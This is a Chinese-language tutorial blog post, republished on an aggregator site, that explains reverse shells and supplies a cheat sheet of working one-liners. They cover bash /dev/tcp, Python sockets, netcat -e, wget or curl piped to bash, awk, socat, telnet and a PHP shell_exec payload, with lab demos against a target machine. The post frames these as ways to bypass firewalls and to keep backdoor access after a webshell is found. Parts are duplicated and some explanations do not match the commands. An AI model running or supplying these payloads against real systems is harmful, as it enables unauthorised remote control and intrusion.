反弹shell详细易懂讲解,看这一篇就够了


文章目录

  • 反弹shell详细易懂讲解,看这一篇就够了
    • 一: 基础shell知识
      • 什么是shell,bash与shell的区别?
      • 通俗解释
      • 类型
      • 功能
      • 常见命令
    • 二: 什么是反弹shell
    • 三: 反弹shell类型
      • bash反弹shell
      • Netcat 一句话反弹
      • curl反弹shell
        • 正确姿势
      • wget方式反弹
      • awk反弹 Shell
      • socat反弹 Shell
      • Telnet 反弹 Shell
      • php反弹shell


反弹shell详细易懂讲解,看这一篇就够了

一: 基础shell知识

什么是shell,bash与shell的区别?

bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。

Shell 就像是计算机的“翻译官”,它让我们能够用人类的语言告诉计算机该做什么。我们输入命令,Shell 就把这些命令翻译给计算机内核,让它执行,然后再把结果反馈给我们。

通俗解释

想象一下,你是一个大厨(用户),你有很多食材(计算机资源)和厨房用具(硬件和软件),但你需要一个助手(Shell)来帮你完成具体的操作。

  • 命令行界面 (CLI) Shell:就像是你和助手面对面交流。你告诉助手要做什么(比如“切洋葱”),助手按照你的指令去做。

    • 你说:“显示所有文件。”(输入 ls 命令)
    • 助手展示文件列表给你看。
  • 图形用户界面 (GUI) Shell:就像你在厨房里用菜单和按钮控制助手。比如,你按下一个按钮,助手帮你打开烤箱。

举例子

假设你想整理房间(操作计算机文件):

  • 你告诉助手:“把书移到书架上。”(输入 mv book.txt /books 命令)
  • 助手就会帮你把书移到书架上(把文件移动到指定目录)。

Shell 其实就是你和计算机沟通的桥梁,帮助你更方便地控制和管理计算机。

类型

  1. 命令行界面 (CLI) Shell

    • Bash(Bourne Again Shell):最常见的 Unix/Linux Shell,功能强大,广泛使用。
    • Sh(Bourne Shell):较老的 Shell,Bash 的前身。
    • Zsh(Z Shell):类似于 Bash,但有更多的功能和可配置性。
    • Csh(C Shell):语法类似于 C 语言,有些特性与其他 Shell 不同。
    • Ksh(Korn Shell):综合了很多其他 Shell 的特性。
  2. 图形用户界面 (GUI) Shell

    • Windows Explorer:Windows 操作系统中的默认图形界面。
    • GNOME Shell:Linux 系统中 GNOME 桌面环境的图形界面。
    • KDE Plasma:Linux 系统中 KDE 桌面环境的图形界面。

功能

  • 命令解释:将用户输入的命令解释并传递给操作系统执行。
  • 脚本编写:用户可以编写脚本文件,以批处理的方式执行一系列命令。
  • 环境管理:提供环境变量管理和配置的功能。
  • 任务控制:允许用户启动、停止、挂起和管理任务。

常见命令

  • 文件操作:如 lscpmvrm 等。
  • 系统信息:如 unamedftopps 等。
  • 网络操作:如 pingnetstatssh 等。
  • 文本处理:如 catgrepawksed 等。

二: 什么是反弹shell

通常情况下,shell 是指你通过命令行直接控制一台计算机。但在反弹 shell 的情况下,目标计算机主动连接到攻击者的计算机,从而绕过防火墙和其他安全措施

为什么要反弹Shell

反弹Shell通常用于以下情形:被控端因防火墙受限、权限不足、端口被占用等。通过反弹Shell,攻击者可以绕过这些限制,实现对目标系统的控制。

假设我们攻击了一台机器,并在该机器上打开了一个端口,攻击者可以在自己的机器上连接目标机器(目标IP:目标端口),这是一种常规的正向连接形式,如远程桌面、Web服务、SSH、Telnet等。

正向连接失效的情况

在以下情况下,正向连接可能无法使用:

  1. 客户机在局域网内,攻击者无法直接连接。
  2. 目标机器的IP动态改变,无法持续控制。
  3. 由于防火墙限制,目标机器只能发送请求,不能接收请求。
  4. 对于病毒、木马等恶意软件,受害者何时中招、网络环境、开关机时间等情况都是未知的。
  5. Webshell下执行命令不交互,为了提权或进行其它操作,必须反弹Shell。
  6. 为了提权或执行其它操作,需要一个反弹 shell 作为后门,即使 webshell 被发现删除,也能保持控制权。

让受害者主机主动连接攻击者的服务端,才是好方法

三: 反弹shell类型

bash反弹shell

Netcat是一个功能强大的网络工具,可以用来创建反弹Shell。

  1. 目标机器(被控机器)执行以下命令:

    /bin/bash -i >& /dev/tcp/攻击者IP/攻击者端口 0>&1
    

    解释:

    • /bin/bash -i:启动一个交互式的Bash Shell。
    • >& /dev/tcp/攻击者IP/攻击者端口:将Bash的标准输入、标准输出和标准错误重定向到攻击者的IP和端口。
    • /dev/tcp/:Linux中的一个特殊文件, 打开这个文件就类似于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。
    • Socket(套接字):计算机网络中用于通信的一种机制,允许两台设备(例如计算机或服务器)通过网络进行数据传输。Socket是网络编程的基础,广泛应用于客户端-服务器模型中,用于建立连接并进行数据交换。
    • 0>&1:将标准输入重定向到标准输出。
  2. 攻击者机器上监听端口:

    nc -lvp 攻击者端口
    

    解释:

    • nc:启动Netcat。
    • -lvp:监听模式、详细输出、指定端口。

扩展:如果目标机器上有Python环境,也可以使用Python脚本实现反弹Shell。

  1. 目标机器(被控机器)执行以下Python代码:

    python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击者IP",攻击者端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
    
  2. 攻击者机器上监听端口:

    nc -lvp 攻击者端口
    

演示

攻击机(kali):10.73.127.154

目标机(centos): 10.73.127.144

先在攻击者机器上监听端口8888(随便那个端口都可以)

nc -lvp 8888

在这里插入图片描述

接着目标机执行bash命令,连接到攻击机

 bash -i >& /dev/tcp/10.73.127.154/8888 0>&1

在这里插入图片描述

接着返回攻击机,执行一些命令

在这里插入图片描述

Netcat 一句话反弹

1.在攻击者机器上,继续监听某个端口即可

nc -lvp 攻击者端口

2.目标机,目标机要有nc。

nc 10.73.127.154. 8888 -e /bin/bash

使用 Netcat (nc) 工具建立一个 TCP 会话连接,将本地的 Bash Shell 通过这个会话反弹给目标主机 (192.168.31.151)。

  • nc: 调用 Netcat 工具。Netcat 是一个功能强大的网络工具,可以用于读取和写入网络连接。
  • 10.73.127.154: 指定攻击机的 IP 地址。此处表示攻击者
  • 8888: 指定攻击机上的端口号。此处表示攻击者机器上监听的端口。
  • -e /bin/bash: 将本地的 Bash Shell 绑定到 Netcat 连接上。当连接建立时,目标主机上会运行 Bash Shell,从而使攻击者可以远程执行命令。

演示

1.攻击者机器上继续监听端口8888

2.目标机安装nc,如果安装nc提示:软件包 2:nmap-ncat-6.40-19.el7.x86_64 已安装并且是最新版本,无须任何处理,就需要手动安装NC,参考这篇文章 :centos7 安装NetCat - 知乎 (zhihu.com)](https://zhuanlan.zhihu.com/p/181528383)

在这里插入图片描述

2.这里我还是用另一个kali作为目标机来演示,

nc 10.73.127.154 8888 -e /bin/bash

目标机

在这里插入图片描述

攻击机

在这里插入图片描述

curl反弹shell

curl 是一个命令行工具,用于向服务器发送请求和获取数据。在反弹 Shell 的场景中,curl 可以用来通过 HTTP 请求发送命令,并将命令的输出发送到攻击者的服务器。

1.在攻击者机器上,使用 Netcat 监听端口 8888

nc -lvp 8888
  • -l:监听模式(listen)。
  • -v:详细模式(verbose)。
  • -p:指定端口(port)。

2.目标机器(发起连接)

在被控机器上,通过 Webshell 或其他方式执行以下 curl 命令:

curl -s -X POST http://10.73.127.154:8888 --data-binary @/bin/bash
  • -s:静默模式(silent),不输出进度信息。
  • -X POST:指定 HTTP POST 方法。
  • --data-binary @/bin/bash:将 /bin/bash 的输出作为二进制数据发送到攻击者服务器。

扩展:使用 Python 的 HTTP.server 作为监听服务器(这个是错的!!!,看下面解释,并带正确姿势)

另一种方法是使用 Python 内置的 HTTP 服务器来监听端口并处理连接:

1.攻击者机器(使用 Python HTTP 服务器)

在攻击者机器上,运行以下命令启动 HTTP 服务器:

python3 -m http.server 8888

2.目标机器(发起连接)

在被控机器上,通过 Webshell 或其他方式执行以下 curl 命令:

curl http://10.73.127.154:8888 --output - | bash
  • --output -:将响应输出到标准输出(即终端)。
  • | bash:将输出传递给 Bash 解释执行。

演示

1.攻击者机器上继续监听端口8888,这次用Python HTTP 服务器监听一下

python3 -m http.server 8888

在这里插入图片描述

2.目标机器发送 curl请求,就在这个时候出错了,

bash: 行 1: 未预期的记号 “newline” 附近有语法错误
bash: 行 1: `’

在这里插入图片描述

查了资料才知道

出现这个错误是因为使用了错误的方法来尝试通过 HTTP 请求传输 shell 命令。实际上,当访问一个 URL(例如,通过 curl),它会返回 HTML 内容,而不是你期望的 shell 命令。这就是为什么你会看到 <!DOCTYPE HTML>,这是一个 HTML 文件的开头标记。

正确姿势

如果使用 HTTP 来传输命令,可以使用一个简单的 Python HTTP 服务器来接受命令并执行。在攻击者机器上运行一个 Python 服务器脚本来处理传入的请求。

  1. 在攻击者机器上创建一个 Python 服务器脚本

    创建一个名为 http_shell_server.py 的脚本:

    import http.server
    import socketserver
    import subprocessclass Handler(http.server.SimpleHTTPRequestHandler):def do_GET(self):command = self.path[1:]  # Get the command from the URL pathtry:output = subprocess.check_output(command, shell=True)self.send_response(200)self.send_header("Content-type", "text/plain")self.end_headers()self.wfile.write(output)except subprocess.CalledProcessError as e:self.send_response(500)self.end_headers()self.wfile.write(str(e).encode())with socketserver.TCPServer(("", 8888), Handler) as httpd:print("serving at port", 8888)httpd.serve_forever()
    

    启动这个服务器:

    python3 http_shell_server.py
    

    在这里插入图片描述

    2.在被控机器上使用 curl 发送命令

    在被控机器上,通过 Webshell 或其他方式执行以下命令:

    curl http://10.73.127.154:8888/ls
    

    这将向攻击者机器发送 HTTP 请求,并在 URL 中包含要执行的命令(例如 ls)。攻击者机器上的 Python 服务器会接收这个命令并执行它,然后将输出返回给被控机器。

在这里插入图片描述

wget方式反弹

wget 是一个用于从 Web 服务器下载文件的命令行工具。在反弹 Shell 的场景中,wget 可以用来从攻击者的服务器下载一个恶意脚本,并在被控机器上执行该脚本,从而实现反弹 Shell。

1.攻击者机器(监听端口)

在攻击者机器上,使用 Netcat 监听端口 8888

nc -lvp 8888

2.创建恶意脚本

在攻击者机器上,创建一个名为 reverse_shell.sh 的脚本,内容如下:

#!/bin/bash
/bin/bash -i >& /dev/tcp/10.73.127.154/8888 0>&1

将这个脚本放在攻击者的 Web 服务器上,使其可以通过 HTTP 访问。

3.被控机器(下载并执行脚本)

在被控机器上,通过 wget 下载并执行这个脚本:

wget -O - http://10.73.127.154/reverse_shell.sh | bash
  • -O -:将下载的内容输出到标准输出。
  • | bash:将输出通过管道传递给 bash 执行。

工作原理

  1. 攻击者机器

    • 启动 Netcat 监听端口,等待连接。
    • 运行 Web 服务器,使 reverse_shell.sh 脚本可通过 HTTP 访问。
  2. 被控机器

    • 使用 wget 命令从攻击者的 Web 服务器下载 reverse_shell.sh 脚本,并通过管道将其传递给 bash 解释执行。
    • 执行脚本后,被控机器的 Shell 将反弹到攻击者机器的 IP 和端口。

演示

跟curl一样

awk反弹 Shell

awk 主要用于文本处理和数据提取,但也可以执行系统命令。我们可以利用这个特性,通过网络连接反弹一个 shell 到攻击者的机器。

攻击者机器(监听端口)

首先,在攻击者机器上使用 Netcat 监听端口 4444

nc -lvp 4444

被控机器(发起连接)

在被控机器上,通过 awk 命令反弹一个 shell:

awk 'BEGIN {s = "/inet/tcp/0/10.73.127.154/4444"; while (1) { do { printf "> " |& s; if ((s |& getline c) <= 0) break; while (c && (c |& getline) > 0) print $0 |& s; close(c) }} close(s) }'
  • BEGIN { ... }awkBEGIN 块用于在处理任何输入数据之前执行一次。
  • s = "/inet/tcp/0/192.168.31.151/4444":定义一个 TCP 连接到攻击者的 IP 和端口。
  • while (1) { ... }:一个无限循环,用于保持连接。
  • printf "> " |& s:将提示符 > 发送到 TCP 连接。
  • if ((s |& getline c) <= 0) break:从连接中读取命令,如果读取失败则退出循环。
  • while (c && (c |& getline) > 0) print $0 |& s:执行从连接中读取的命令,并将输出发送回连接。
  • close(c):关闭当前命令的输出。
  • close(s):关闭 TCP 连接。

socat反弹 Shell

socat 可以创建 TCP 连接,并将本地 shell 的输入和输出重定向到该连接。通过这种方式,可以实现从被控机器反弹一个 shell 到攻击者的机器。

攻击者机器(监听端口)

socat -d -d TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash
  • -d -d:启用详细调试输出。
  • TCP-LISTEN:4444:在端口 4444 上监听 TCP 连接。
  • reuseaddr:允许重新使用本地地址。
  • fork:为每个新的连接创建一个子进程。
  • EXEC:/bin/bash:执行 /bin/bash,将其输入和输出重定向到连接。

被控机器(发起连接)

在被控机器上,通过 socat 命令反弹一个 shell 到攻击者机器:

socat TCP:10.73.127.154:4444 EXEC:/bin/bash
  • TCP:192.168.31.151:4444:连接到攻击者机器的 IP 和端口。
  • EXEC:/bin/bash:执行 /bin/bash,将其输入和输出重定向到连接。

Telnet 反弹 Shell

Telnet 通常用于远程登录到远程服务器或设备,并执行命令。虽然 Telnet 本身不提供加密和身份验证,因此在安全意识强的环境中不建议使用它,但可以利用 Telnet 实现反弹 shell。

*在攻击者机器上监听端口

nc -lvp 4444

或者

telnet -l root -p 4444

在被控机器上发起连接

然后,在被控机器上,利用 Telnet 连接到攻击者机器的 IP 地址和监听的端口:

telnet <attackers_ip> 4444 | /bin/bash | telnet <attackers_ip> 4445

或者使用 Netcat:

nc -e /bin/bash <attackers_ip> 4444

<attackers_ip> 是攻击者机器的 IP 地址。

扩展

攻击机开启两个端口监听,一个用于输入命令,一个用于回显命令执行的结果

nc -l Your_cmd_Port
nc -l Your_result_Port

目标主机触发

telnet Your_IP Your_cmd_Port | /bin/bash | telnet Your_IP Your_result_Port

工控设备中,常常由 telnetd 程序,也可以利用其来开启正向的shell

目标主机开启监听

telnetd -p Your_Port -l /bin/sh

攻击主机正向连接

telnet Your_IP Your_Port

php反弹shell

工作原理

  1. 执行系统命令
    PHP 提供了执行系统命令的函数,如 shell_exec()exec()。攻击者可以在 PHP 脚本中利用这些函数执行系统命令。

  2. 建立反弹连接
    在 PHP 中,攻击者可以构造一个命令,使用 Bash 来建立一个反弹连接到攻击者控制的服务器。这通常通过利用 Bash 的 /dev/tcp 特性来实现。该特性允许 Bash 将数据发送到远程服务器上的指定端口,从而建立一个 TCP 连接。

  3. 重定向输入和输出
    在反弹连接的命令中,攻击者会使用重定向符号 >& 来将命令的输入和输出重定向到网络连接中。这样,攻击者就可以在控制服务器上获取目标服务器上执行命令的结果。

要将php保存成txt文件进行反弹,若为php文件不会反弹成功。

<?php
// 被攻击者主机的 IP 地址和端口
$attacker_ip = 'attackers_ip';
$attacker_port = 4444;// 执行反弹 shell 的命令
$command = "/bin/bash -c 'bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1'";// 执行命令,并将结果输出到 /dev/null,避免在 web 页面显示
shell_exec($command . " > /dev/null 2>&1 &");
?>

立一个反弹连接到攻击者控制的服务器。这通常通过利用 Bash 的 /dev/tcp 特性来实现。该特性允许 Bash 将数据发送到远程服务器上的指定端口,从而建立一个 TCP 连接。

  1. 重定向输入和输出
    在反弹连接的命令中,攻击者会使用重定向符号 >& 来将命令的输入和输出重定向到网络连接中。这样,攻击者就可以在控制服务器上获取目标服务器上执行命令的结果。

要将php保存成txt文件进行反弹,若为php文件不会反弹成功。

<?php
// 被攻击者主机的 IP 地址和端口
$attacker_ip = 'attackers_ip';
$attacker_port = 4444;// 执行反弹 shell 的命令
$command = "/bin/bash -c 'bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1'";// 执行命令,并将结果输出到 /dev/null,避免在 web 页面显示
shell_exec($command . " > /dev/null 2>&1 &");
?>

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/332559.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

[6] CUDA之线程同步

CUDA之线程同步 共享内存&#xff1a;线程时间需要互相交换数据才能完成任务的情况并不少见&#xff0c;因此&#xff0c;必须存在某种能让线程彼此交流的机制当很多线程并行工作并且访问相同的数据或者存储器位置的时候&#xff0c;线程间必须正确的同步线程之间交换数据并不…

前端:音频可视化(H5+js版本)

一、效果展示 HTML5JS实现一个简单的音频可视化 二、代码 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8" /><title>音频可视化</title><style></style></head><body><divs…

构建高效的在线培训机构CRM应用架构实践

在当今数字化时代&#xff0c;在线培训已成为教育行业的重要趋势之一。为了提供更好的学习体验和管理服务&#xff0c;在线培训机构需要构建高效的CRM&#xff08;Customer Relationship Management&#xff09;应用架构。本文将探讨在线培训机构CRM应用架构的设计与实践。 一、…

golang创建式设计模式---工厂模式

创建式设计模式—工厂模式 目录导航 创建式设计模式---工厂模式1)什么是工厂模式2)使用场景3)实现方式4)实践案例5)优缺点分析 1)什么是工厂模式 工厂模式(Factory Method Pattern)是一种设计模式&#xff0c;旨在创建对象时&#xff0c;将对象的创建与使用进行分离。通过定义…

每日一题23:统计文本中单词出现的次数

一、每日一题 解答&#xff1a; import pandas as pd def count_occurrences(files: pd.DataFrame) -> pd.DataFrame:bull_cnt len(files[files[content].str.contains(r\sbull\s)])bear_cnt len(files[files[content].str.contains(r\sbear\s)])res_df pd.DataFrame({…

MySql基础(一)--最详细基础入门,看完就懂啦(辛苦整理,想要宝宝的赞和关注嘻嘻)

前言 希望你向太阳一样&#xff0c;有起有落&#xff0c;不失光彩~ 一、数据库概述 1. 什么是数据库 数据库就是存储数据的仓库&#xff0c;其本质是一个文件系统&#xff0c;数据按照特定的格式将数据存储起来&#xff0c;用户可以对数据库中的数据进行增加&#xff0c;修改&…

Python 小游戏——贪吃蛇

Python 小游戏——贪吃蛇 文章目录 Python 小游戏——贪吃蛇项目介绍环境配置代码设计思路1. 初始化和变量定义2. 创建游戏窗口和FPS控制器3. 初始化贪吃蛇和食物的位置4. 控制贪吃蛇的方向和分数5. 主游戏循环 难点分析源代码呈现代码结果 项目介绍 贪吃蛇游戏是一款通过上下…

Java核心:注解处理器

Java提供了一个javac -processor命令支持处理标注有特定注解的类&#xff0c;来生成新的源文件&#xff0c;并对新生成的源文件重复执行。执行的命令大概是这样的: javac -XprintRounds -processor com.keyniu.anno.processor.ToStringProcessor com.keyniu.anno.processor.Po…

【C++】二分查找算法:x的平方根

1.题目 2.算法思路 看到题目可能不容易想到二分查找。 这题考察我们对算法的熟练程度。 二分查找的特点&#xff1a;数组具有二段性(不一定有序)。 题目中没有数组&#xff0c;我们可以造一个从0到x的数组&#xff0c;然后利用二分查找找到对应的值即可。 3.代码 class S…

八种单例模式

文章目录 1.单例模式基本介绍1.介绍2.单例模式八种方式 2.饿汉式&#xff08;静态常量&#xff0c;推荐&#xff09;1.基本步骤1.构造器私有化&#xff08;防止new&#xff09;2.类的内部创建对象3.向外暴露一个静态的公共方法 2.代码实现3.优缺点分析 3.饿汉式&#xff08;静态…

如何查看热门GPT应用?

1、登陆chatgpt 2、访问 https://chatgpt.com/gpts 3、在该界面&#xff0c;可以搜索并使用image generator, Write For Me&#xff0c;Language Teature等热门应用。

【Qt 学习笔记】Qt窗口 | 菜单栏 | QMenuBar的使用及说明

博客主页&#xff1a;Duck Bro 博客主页系列专栏&#xff1a;Qt 专栏关注博主&#xff0c;后期持续更新系列文章如果有错误感谢请大家批评指出&#xff0c;及时修改感谢大家点赞&#x1f44d;收藏⭐评论✍ Qt窗口 | 菜单栏 | QMenuBar的使用及说明 文章编号&#xff1a;Qt 学习…

Go微服务: Nacos的搭建和基础API的使用

Nacos 概述 文档&#xff1a;https://nacos.io/docs/latest/what-is-nacos/搭建&#xff1a;https://nacos.io/docs/latest/quickstart/quick-start-docker/有很多种搭建方式&#xff0c;我们这里使用 docker 来搭建 Nacos 的搭建 这里&#xff0c;我们选择单机模式&#xf…

Redis可视化工具:Another Redis Desktop Manager下载安装使用

1.Github下载 github下载地址&#xff1a; Releases qishibo/AnotherRedisDesktopManager GitHub 2. 安装 直接双击exe文件进行安装 3. 连接Redis服务 先启动Redis服务&#xff0c;具体启动过程可参考&#xff1a; Windows安装并启动Redis服务端&#xff08;zip包&#xff09…

从程序被SQL注入来MyBatis 再谈 #{} 与 ${} 的区别

缘由 最近在的一个项目上面&#xff0c;发现有人在给我搞 SQL 注入&#xff0c;我真的想说我那么点资源测试用的阿里云服务器&#xff0c;个人估计哈&#xff0c;估计能抗住他的请求。狗头.png 系统上面的截图 数据库截图 说句实在的&#xff0c;看到这个之后我立马就是在…

Nginx文件解析漏洞复现:CVE-2013-4547

漏洞原理 CVE-2013-4547漏洞是由于非法字符空格和截止符导致Nginx在解析URL时的有限状态机混乱&#xff0c;导致攻击者可以通过一个非编码空格绕过后缀名限制。假设服务器中存在文件1. jpg&#xff0c;则可以通过改包访问让服务器认为访问的为PHP文件。 漏洞复现 开启靶场 …

【数据结构】快速排序详解!

文章目录 1. 快速排序的非递归版本2. 快速排序2.1 hoare 版本一2.2 挖坑法 &#x1f427;版本二2.3 前后指针 版本三2.4 调用以上的三个版本的快排 3. 快速排序的优化 1. 快速排序的非递归版本 &#x1f192;&#x1f427;关键思路&#xff1a; &#x1f34e;① 参数中的begin…

呆马科技----构建智能可信的踏勘云平台

近年来&#xff0c;随着信息技术的快速发展&#xff0c;各个行业都在积极探索信息化的路径&#xff0c;以提升工作效率和服务质量。智慧踏勘云平台是基于区块链和大数据技术构建的全流程智慧可信踏勘解决平台。平台集远程视频、数据显示、工作调度、过程记录为一体&#xff0c;…

嵌入式进阶——舵机控制PWM

&#x1f3ac; 秋野酱&#xff1a;《个人主页》 &#x1f525; 个人专栏:《Java专栏》《Python专栏》 ⛺️心若有所向往,何惧道阻且长 文章目录 舵机信号线代码示例初始化PWM初始化UART打印日志初始化外部中断Extimain函数 舵机最早用于船舶上实现转向功能,由于可以通过程序连…

Spring从零开始学使用系列(四)之@PostConstruct和@PreDestroy注解的使用

如果各位老爷觉得可以&#xff0c;请点赞收藏评论&#xff0c;谢谢啦&#xff01;&#xff01; 文章中涉及到的图片均由AI生成 公众号在最下方&#xff01;&#xff01;&#xff01; 目录 1. 介绍 1.1 PostConstruct概述 1.2 PreDestroy概述 2. 基本用法 2.1 注册CommonAnn…